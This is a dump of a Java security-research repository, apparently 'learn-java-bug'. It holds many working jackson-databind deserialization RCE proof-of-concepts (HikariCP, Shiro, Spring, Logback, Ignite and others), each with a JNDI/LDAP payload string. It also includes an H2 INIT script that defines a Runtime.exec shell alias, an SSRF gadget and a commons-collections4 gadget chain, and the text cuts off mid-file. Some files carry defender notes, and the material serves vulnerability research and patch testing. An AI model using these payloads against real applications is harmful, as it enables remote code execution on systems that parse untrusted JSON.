--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * jackson-databind <= 2.10.2 and <= 2.9.10.3 RCE; requires default typing to be enabled
 * (reported by threedr3am & V1ZkRA).
 *
 * CVE-2020-9547, CVE-2020-9548
 *
 * Dependencies:
 *   com.codahale.metrics : metrics-healthchecks : 3.0.2
 *   br.com.anteros : Anteros-Core : 1.2.1
 *   br.com.anteros : Anteros-DBCP : 1.0.1
 *
 * @author threedr3am
 */
public class AnterosPoc {

    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();

        // "healthCheckRegistry" takes a JNDI name, mirroring the HikariConfig gadget
        // (cf. HikariConfigPoc) — presumably the same setter logic in the Anteros fork.
        final String json = "[\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"healthCheckRegistry\": \"ldap://localhost:43658/Calc\"}]";
        mapper.readValue(json, Object.class);
    }

}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/AriesJMSPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * Of limited use: the lookup only fires when writeValueAsString is called on the deserialized
 * object (a getter-triggered gadget), not on readValue alone.
 *
 * Reporter: (original note: not blocked upstream at the time — "leftover to pick up")
 *
 * Fix will be included in: 2.9.10.4. Does not affect 2.10.0 and later.
 *
 * aries.transaction.jms gadget:
 *   org.apache.aries.transaction : org.apache.aries.transaction.jms : 2.0.0
 *
 * @author threedr3am
 */
public class AriesJMSPoc {

    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();

        // "tmJndiName" is the JNDI name and "tmFromJndi" switches the lookup on.
        final String json = "[\"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory\", {\"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true}]";
        Object o = mapper.readValue(json, Object.class);
        // Serialization invokes the getters; that is where the JNDI lookup presumably happens.
        mapper.writeValueAsString(o);
    }


}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/AriesJMSPoc2.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * Of limited use: the lookup only fires when writeValueAsString is called on the deserialized
 * object, not on readValue alone.
 *
 *
Reporter: Srikanth Ramu
 *
 * Fix will be included in: 2.9.10.4. Does not affect 2.10.0 and later.
 *
 * aries.transaction.jms gadget:
 *   org.apache.aries.transaction : org.apache.aries.transaction.jms : 2.0.0
 *
 * @author threedr3am
 */
public class AriesJMSPoc2 {

    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();

        // Same properties as AriesJMSPoc, on the internal XaPooledConnectionFactory.
        final String json = "[\"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory\", {\"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true}]";
        Object o = mapper.readValue(json, Object.class);
        // Serialization invokes the getters; that is where the JNDI lookup presumably happens.
        mapper.writeValueAsString(o);
    }


}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/EhcacheJndi.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import com.threedr3am.bug.common.server.RmiServer;
import java.io.IOException;

/**
 * CVE-2019-14379
 * jackson-databind RCE, versions < 2.9.9.2.
 *
 * @author threedr3am
 */
public class EhcacheJndi {
    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) throws IOException {

        // "properties.jndiName" is the name DefaultTransactionManagerLookup resolves.
        final String json = "[\"net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup\","
                + "{\"properties\":{\"jndiName\":\"ldap://localhost:43658/Calc\"}}]";
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        Object o =
mapper.readValue(json, Object.class);
        // Getter-triggered: the lookup fires during serialization, not during readValue.
        mapper.writeValueAsString(o);

    }
}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/H2Rce.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

/**
 * CVE-2019-12384
 * jackson-databind RCE, versions < 2.9.9.2.
 *
 * Uses logback's DriverManagerConnectionSource with an in-memory H2 JDBC URL whose INIT clause
 * runs a SQL script fetched over HTTP. Unlike the JNDI gadgets in this package, no LDAP/RMI
 * server is needed — only an HTTP server hosting the script.
 *
 * @author threedr3am
 */
public class H2Rce {
    public static void main(String[] args) throws IOException {

        ObjectMapper objectMapper = new ObjectMapper();
        objectMapper.enableDefaultTyping(); // enable default typing
        // TODO serve the resources file inject.sql from an HTTP server at the URL below
        final String json = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", "
                + "{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:80/inject.sql'\"}]";
        Object o = objectMapper.readValue(json, Object.class); // deserialize
        // Serialization calls the getters; presumably getConnection() opens the H2 URL here.
        String s = objectMapper.writeValueAsString(o);
    }
}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/HikariConfigPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * jackson-databind <= 2.7.9.6, <= 2.8.11.4, <= 2.9.9.3 RCE; requires default typing to be
 * enabled.
 *
 * Dependency: com.zaxxer : HikariCP
 *
 * @author threedr3am
 */
public class HikariConfigPoc {

    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) throws IOException {

//TODO 使用rmi server模式时,jdk版本高的需要开启URLCodebase trust 29 | // System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true"); 30 | 31 | ObjectMapper mapper = new ObjectMapper(); 32 | mapper.enableDefaultTyping(); 33 | 34 | // mapper.readValue("[\"com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\":\"rmi://localhost:43657/Calc\"}]", Object.class); 35 | mapper.readValue("[\"com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\":\"ldap://localhost:43658/Calc\"}]", Object.class); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/threedr3am/bug/jackson/rce/IbatisSqlmapPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.jackson.rce; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | import com.threedr3am.bug.common.server.LdapServer; 5 | import java.io.IOException; 6 | 7 | /** 8 | * 9 | * jackson-databind <= 2.9.10.3 RCE,需要开启DefaultType (reported by threedr3am & V1ZkRA) 10 | * 11 | * CVE-2020-9547, CVE-2020-9548 12 | * 13 | * 14 | * org.apache.ibatis 15 | * ibatis-sqlmap 16 | * 2.3.4.726 17 | * 18 | * 19 | * 20 | * javax 21 | * javaee-api 22 | * 8.0.1 23 | * 24 | * 25 | * @author threedr3am 26 | */ 27 | public class IbatisSqlmapPoc { 28 | 29 | static { 30 | //rmi server示例 31 | // RmiServer.run(); 32 | 33 | //ldap server示例 34 | LdapServer.run(); 35 | } 36 | 37 | public static void main(String[] args) throws IOException { 38 | ObjectMapper mapper = new ObjectMapper(); 39 | mapper.enableDefaultTyping(); 40 | 41 | String json = "[\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\", {\"properties\": {\"UserTransaction\":\"ldap://localhost:43658/Calc\"}}]"; 42 | mapper.readValue(json, Object.class); 43 | } 44 | 45 | } 46 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/threedr3am/bug/jackson/rce/IgniteJtaPoc.java: 
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * Demonstrates a polymorphic-deserialization gadget in Apache Ignite's JTA integration;
 * it is reachable only when the ObjectMapper has default typing enabled.
 *
 * Of limited practical use: writeValueAsString must be called to trigger it.
 *
 * ignite jta gadget
 *
 * Mitre id:
 * Reporters:
 *
 * Fix will be included in:
 *
 * 2.9.10.4
 * Does not affect 2.10.0 and later
 *
 * org.apache.ignite
 * ignite-jta
 * 2.8.0
 *
 * Defender notes: the precondition shared by every PoC in this package is
 * {@code enableDefaultTyping()} on a mapper that parses attacker-controlled JSON.
 * Mitigation is the fixed version above, never enabling default typing for untrusted
 * input, and on 2.10+ replacing it with {@code activateDefaultTyping(PolymorphicTypeValidator)}
 * backed by an allow-list. Outbound LDAP/RMI connections from a JVM that only parsed
 * JSON are the detection signal.
 *
 * @author threedr3am
 */
public class IgniteJtaPoc {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example: runs at class load (before main) and presumably listens
        // on the port used in the JSON below — the server side of the JNDI lookup.
        LdapServer.run();
    }

    /**
     * Entry point: parses the payload and serializes the resulting object.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        // Root cause: with default typing the first array element names the class
        // Jackson instantiates. Deprecated since Jackson 2.10 (use activateDefaultTyping).
        mapper.enableDefaultTyping();

        // Type id plus a jndiNames list carrying an attacker-chosen LDAP URL.
        String json = "[\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\", {\"jndiNames\": [\"java.util.ArrayList\", [\"ldap://localhost:43658/Calc\"]]}]";
        Object o = mapper.readValue(json, Object.class);
        // Per the class doc, readValue alone does not fire; serialization (getter
        // invocation) is what performs the lookup.
        mapper.writeValueAsString(o);
    }

}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/IgniteJtaPoc2.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;
import org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory;

/**
 * Variant of {@link IgniteJtaPoc} using CacheJndiTmFactory; same precondition
 * (default typing on attacker-controlled JSON), same mitigations.
 *
 * Even less practical than the above: ((CacheJndiTmFactory) o).create() must be
 * called to trigger it.
 *
 * ignite jta gadget
 *
 * Mitre id:
 * Reporters:
 *
 * Fix will be included in:
 *
 * 2.9.10.4
 * Does not affect 2.10.0 and later
 *
 * org.apache.ignite
 * ignite-jta
 * 2.8.0
 *
 * @author threedr3am
 */
public class IgniteJtaPoc2 {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example (started at class load, see IgniteJtaPoc)
        LdapServer.run();
    }

    /**
     * Entry point: deserializes the factory and invokes create() on it explicitly.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // see IgniteJtaPoc: the shared precondition

        // The gadgets seen recently are all of very limited use
        String json = "[\"org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory\", {\"jndiNames\": [\"ldap://localhost:43658/Calc\"]}]";
        Object o = mapper.readValue(json, Object.class);
        // Explicit call required: a real target would have to invoke create() on the
        // deserialized object itself, which is why the author rates this as impractical.
        ((CacheJndiTmFactory) o).create();

    }

}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/JndiConverterPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * Demonstrates the xbean-reflect JndiConverter gadget; only readValue is needed.
 *
 * jackson-databind <= 2.10.2 RCE, requires default typing to be enabled (reported by threedr3am)
 *
 * CVE-2020-8840
 *
 * Gadget depending on xbean-reflect
 *
 * org.apache.xbean
 * xbean-reflect
 *
 * Mitigation: upgrade past the affected range, and do not enable default typing on
 * untrusted input (see IgniteJtaPoc for the allow-list replacement).
 *
 * @author threedr3am
 */
public class JndiConverterPoc {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example (started at class load, see IgniteJtaPoc)
        LdapServer.run();
    }

    /**
     * Entry point: a single readValue call on the payload is enough.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // see IgniteJtaPoc: the shared precondition

        // Presumably the asText setter performs the JNDI lookup — no serialization step.
        String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:43658/Calc\"}]";
        mapper.readValue(json, Object.class);
    }

}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/LogbackJndi.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import com.threedr3am.bug.common.server.RmiServer;
import java.io.IOException;

/**
 * Demonstrates the logback JNDIConnectionSource gadget; needs default typing and a
 * serialization step (writeValueAsString) after deserialization.
 *
 * logback jndi rce jackson < 2.9.9.2
 *
 * CVE-2019-14439
 *
 * Mitigation: upgrade jackson-databind, and never enable default typing on
 * attacker-controlled JSON (use activateDefaultTyping with an allow-list on 2.10+).
 *
 * @author threedr3am
 */
public class LogbackJndi {
    static {
        // RMI server example (RmiServer import is only used by this commented line)
        // RmiServer.run();

        // LDAP server example: started at class load, presumably serving the URL below
        LdapServer.run();
    }

    /**
     * Entry point: deserializes the payload, then serializes it to trigger the getter.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {

        // Type id plus a jndiLocation holding an attacker-chosen LDAP URL.
        String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\",{\"jndiLocation\":\"ldap://localhost:43658/Calc\"}]";
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // the shared precondition of every PoC here
        Object o = mapper.readValue(json, Object.class);
        // Serialization invokes the getters; that is where the lookup presumably happens.
        mapper.writeValueAsString(o);
    }
}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/QuartzPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;
import org.quartz.utils.JNDIConnectionProvider;

/**
 * Quartz JNDIConnectionProvider gadget. It only works because a mix-in with a
 * {@code @JsonCreator} is registered first, i.e. the target application would have to
 * have configured such a mix-in itself — hence the author's rating.
 *
 * A gadget of even less practical use than the others
 *
 * @author threedr3am
 */
public class QuartzPoc {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example (started at class load)
        LdapServer.run();
    }

    /**
     * Entry point: registers the creator mix-in, then parses the payload.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // shared precondition

        // Reproduced, but frankly a payload like this is of very little practical use
        // The mix-in supplies the constructor binding Jackson would otherwise lack.
        mapper.addMixIn(JNDIConnectionProvider.class, AbstractJNDIConnectionProvider.class);
        String json = "[\"org.quartz.utils.JNDIConnectionProvider\", {\"jndiUrl\": \"ldap://localhost:43658/Calc\"}]";
        mapper.readValue(json, Object.class);
    }


}

/**
 * Mix-in that binds the two-argument JNDIConnectionProvider constructor to JSON
 * properties; without it the provider is not creatable from JSON.
 */
abstract class AbstractJNDIConnectionProvider extends JNDIConnectionProvider{
    @JsonCreator
    public AbstractJNDIConnectionProvider( @JsonProperty("jndiUrl") String jndiUrl, @JsonProperty ("alwaysLookup") boolean alwaysLookup) {
        super(jndiUrl, alwaysLookup);
    }
}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/QuercusPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature; // unused in this file
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * Quercus ResourceRef gadget; needs default typing and a serialization step.
 *
 * Of limited practical use: writeValueAsString must be called to trigger it
 *
 * quercus ResourceRef jndi gadget
 *
 * com.caucho
 * quercus
 * 4.0.63
 *
 * @author threedr3am
 */
public class QuercusPoc {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example (started at class load)
        LdapServer.run();
    }

    /**
     * Entry point: deserializes the payload, then serializes it to trigger the getter.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // shared precondition

        // lookupName carries the attacker-chosen LDAP URL.
        String json = "[\"com.caucho.config.types.ResourceRef\", {\"lookupName\": \"ldap://localhost:43658/Calc\"}]";
        Object o = mapper.readValue(json, Object.class);
        // Per the class doc the lookup only fires during serialization.
        mapper.writeValueAsString(o);
    }


}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/ShiroPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * shiro-core JndiRealmFactory gadget; needs default typing and a serialization step.
 *
 * Of limited practical use: writeValueAsString must be called to trigger it, because
 * although Collection getRealms() returns a Collection, the generic element type
 * apparently makes value parsing use AsArrayTypeDeserializer, and the non-null check
 * before the getter is invoked throws an exception
 *
 * shiro-core gadget
 *
 * org.apache.shiro
 * shiro-core
 *
 * Mitigation as for the other PoCs in this package: never enable default typing on
 * untrusted JSON; on 2.10+ use activateDefaultTyping with an allow-list.
 *
 * @author threedr3am
 */
public class ShiroPoc {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example (started at class load)
        LdapServer.run();
    }

    /**
     * Entry point: deserializes the payload, then serializes it to trigger the getter.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // shared precondition

        // jndiNames is passed as a plain string here, not a list.
        String json = "[\"org.apache.shiro.realm.jndi.JndiRealmFactory\", {\"jndiNames\": \"ldap://localhost:43658/Calc\"}]";
        Object o = mapper.readValue(json, Object.class);
        // Serialization invokes getRealms(); per the class doc that is where the lookup fires.
        mapper.writeValueAsString(o);
    }


}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/ShiroPoc2.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * shiro-core JndiObjectFactory gadget; same preconditions as {@link ShiroPoc}.
 *
 * Of limited practical use: writeValueAsString must be called to trigger it
 *
 * shiro-core gadget
 *
 * org.apache.shiro
 * shiro-core
 *
 * @author threedr3am
 */
public class ShiroPoc2 {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example (started at class load)
        LdapServer.run();
    }

    /**
     * Entry point: deserializes the payload, then serializes it to trigger the getter.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // shared precondition

        // resourceName carries the attacker-chosen LDAP URL.
        String json = "[\"org.apache.shiro.jndi.JndiObjectFactory\", {\"resourceName\": \"ldap://localhost:43658/Calc\"}]";
        Object o = mapper.readValue(json, Object.class);
        // Per the class doc the lookup only fires during serialization.
        mapper.writeValueAsString(o);
    }


}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/SpringAopPoc2.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.rce;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * Spring gadget chaining two polymorphic type ids: an outer BeanReferenceFactoryBean
 * whose beanFactory property is itself a typed SimpleJndiBeanFactory. readValue alone
 * is used here (no serialization step).
 *
 * spring gadget
 *
 * org.springframework
 * spring-core
 * 4.3.26.RELEASE
 *
 * org.springframework
 * spring-beans
 * 3.0.7.RELEASE
 *
 * org.springframework
 * spring-web
 * 4.3.26.RELEASE
 *
 * Mitigation as for the other PoCs in this package: never enable default typing on
 * untrusted JSON; on 2.10+ use activateDefaultTyping with an allow-list.
 *
 * @author threedr3am
 */
public class SpringAopPoc2 {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example (started at class load)
        LdapServer.run();
    }

    /**
     * Entry point: a single readValue on the nested payload.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // shared precondition

        // Nested type ids: default typing applies recursively to the beanFactory value.
        String json = "[\"org.springframework.beans.factory.config.BeanReferenceFactoryBean\", {\"targetBeanName\": \"ldap://localhost:43658/Calc\",\"beanFactory\":[\"org.springframework.jndi.support.SimpleJndiBeanFactory\", {\"shareableResources\":[\"ldap://localhost:43658/Calc\"]}]}]";
        Object o = mapper.readValue(json, Object.class); // result intentionally unused
    }


}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/ssrf/JREJeditorPaneSSRFPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.ssrf;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.HTTPServer;
import java.io.IOException;

/**
 * JRE-only gadget: javax.swing.JEditorPane's page property makes the JVM fetch the
 * given URL, so default typing on untrusted JSON yields server-side request forgery
 * with no third-party library involved. The class doc below says RCE; the package name
 * and the observable effect (an outbound HTTP request) indicate SSRF.
 *
 * jackson-databind <= 2.9.10.3 and <= 2.10.2 RCE, requires default typing to be enabled
 *
 * (todo: dependency ships with the JRE) (Discovered by threedr3am) This is a fairly good gadget
 *
 * @author threedr3am
 */
public class JREJeditorPaneSSRFPoc {
    static {
        // Local HTTP server on the port used in the payload; it is the request's target.
        HTTPServer.PORT = 23234;
        HTTPServer.run(null);
    }

    /**
     * Entry point: a single readValue on the payload.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // the shared precondition of every PoC in this module

        // Setting "page" presumably calls JEditorPane.setPage(String), which loads the URL.
        String json = "[\"javax.swing.JEditorPane\", {\"page\":\"http://127.0.0.1:23234?a=1&b=2222\"}]";
        mapper.readValue(json, Object.class);
    }
}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/test/PocTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson.test;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * Scratch harness for trying candidate gadgets: the type id in the payload is empty,
 * so as written it presumably does not resolve to any class.
 *
 * @author threedr3am
 */
public class PocTest {

    static {
        // RMI server example
        // RmiServer.run();

        // LDAP server example (started at class load)
        LdapServer.run();
    }

    /**
     * Entry point: parses the placeholder payload.
     *
     * @param args unused
     * @throws IOException from Jackson on malformed input
     */
    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();

        // Placeholder: empty type id and a dummy property name.
        String json = "[\"\", {\"aaaaa\":\"ldap://localhost:43658/Calc\"}]";
        mapper.readValue(json, Object.class);
    }

}
--------------------------------------------------------------------------------
/jackson/src/main/resources/inject.sql:
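--------------------------------------------------------------------------------
-- Loaded by H2Rce through INIT=RUNSCRIPT FROM <url> in the JDBC URL. H2 lets a script
-- define a Java-source alias, so whoever controls the JDBC URL controls a Java method.
-- Defender: treat JDBC URLs as code — never build them from input.
CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {
    String[] command = {cmd};
    Runtime.getRuntime().exec(command);
}
$$;
CALL SHELLEXEC('/Applications/Calculator.app/Contents/MacOS/Calculator')
--------------------------------------------------------------------------------
/java-compile/pom.xml:
--------------------------------------------------------------------------------
learn-java-bug com.xyh 1.0-SNAPSHOT 4.0.0 java-compile org.javassist javassist 3.25.0-GA compile
--------------------------------------------------------------------------------
/java-compile/src/main/java/com/threedr3am/bug/compile/javac/ByJavaCompiler.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.compile.javac;

import javax.tools.JavaCompiler;
import javax.tools.ToolProvider;

/**
 * Runtime compilation with the system JavaCompiler. Compiling a source file chosen at
 * runtime is equivalent to executing it, so the source path and classpath must never
 * come from untrusted input.
 *
 * @author threedr3am
 */
public class ByJavaCompiler {

    // Compile the given java file directly with JavaCompiler
    /**
     * Compiles /tmp/Main.java against /tmp/ccc/CCC.jar and prints the outcome.
     * Kept for existing callers; delegates to {@link #compile(String, String)}.
     */
    public static void c() {
        compile("/tmp/ccc/CCC.jar", "/tmp/Main.java");
    }

    /**
     * Compiles one source file with the system compiler.
     *
     * @param classpath  value passed to javac as -cp
     * @param sourceFile path of the .java file to compile
     * @return true when javac reported success (exit code 0); false otherwise, including
     *         when no compiler is available
     */
    public static boolean compile(String classpath, String sourceFile) {
        JavaCompiler javaCompiler = ToolProvider.getSystemJavaCompiler();
        if (javaCompiler == null) {
            // Documented to return null on a JRE without the compiler; the original
            // dereferenced it unconditionally and threw NullPointerException.
            System.out.println("fail: no system Java compiler available");
            return false;
        }
        int compilationResult = javaCompiler.run(null, null, null, "-cp", classpath, sourceFile);
        // 0 means compilation succeeded
        if (compilationResult == 0) {
            System.out.println("success");
        } else {
            System.out.println("fail");
        }
        return compilationResult == 0;
    }

    public static void main(String[] args) {
        c();
    }
}
--------------------------------------------------------------------------------
/java-compile/src/main/java/com/threedr3am/bug/compile/package-info.java:
--------------------------------------------------------------------------------
/**
 * @author threedr3am
 */
package com.threedr3am.bug.compile;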
--------------------------------------------------------------------------------
/nexus/pom.xml:
--------------------------------------------------------------------------------
learn-java-bug com.xyh 1.0-SNAPSHOT 4.0.0 nexus
--------------------------------------------------------------------------------
/padding-oracle-cbc/pom.xml:
--------------------------------------------------------------------------------
learn-java-bug com.xyh 1.0-SNAPSHOT 4.0.0 padding-oracle-cbc com.xyh common 1.0-SNAPSHOT
--------------------------------------------------------------------------------
/padding-oracle-cbc/src/main/java/com/threedr3am/bug/paddingoraclecbc/package-info.java:
--------------------------------------------------------------------------------
/**
 * PaddingOracleCBC is a demo of padding-oracle and CBC bit-flipping attacks for
 * plaintexts of at most 16 bytes
 *
 * PaddingOracleCBC2 is a demo of padding-oracle and CBC bit-flipping attacks for
 * plaintexts longer than 16 bytes
 *
 * @author xuanyh
 */
package com.threedr3am.bug.paddingoraclecbc;
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/CommonCollections4.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.rmi;

import com.threedr3am.bug.common.utils.Reflections;
import com.threedr3am.bug.rmi.utils.Gadgets;
import org.apache.commons.collections4.bag.TreeBag;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

/**
 * Builds a commons-collections4 deserialization gadget: a TreeBag sorted through a
 * TransformingComparator whose InvokerTransformer is pointed at newTransformer after
 * the element has been inserted. Defender notes: the chain needs the application to
 * deserialize attacker-supplied bytes with commons-collections4 on the classpath;
 * never deserialize untrusted data, and where it is unavoidable install an
 * {@code ObjectInputFilter} (JEP 290) that rejects these classes.
 *
 * @author threedr3am
 */
public class CommonCollections4 {

    /**
     * Assembles the gadget object.
     *
     * @return the TreeBag that carries the armed comparator
     * @throws Exception propagated from Gadgets/Reflections helpers
     */
    public static Object getPayload() throws Exception {
        // The element whose newTransformer() is eventually invoked; the helper is
        // defined elsewhere (utils.Gadgets) and is not visible here.
        Object templates = Gadgets.createTemplatesImpl("/System/Applications/Calculator.app/Contents/MacOS/Calculator");

        // setup harmless chain — toString() so that inserting into the bag is side-effect free
        final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

        // define the comparator used for sorting
        TransformingComparator comp = new TransformingComparator(transformer);

        // prepare CommonsCollections object entry point
        TreeBag tree = new TreeBag(comp);
        tree.add(templates);

        // arm transformer — switched via reflection only after insertion, so the
        // dangerous call presumably happens when the bag is re-sorted on the receiving side
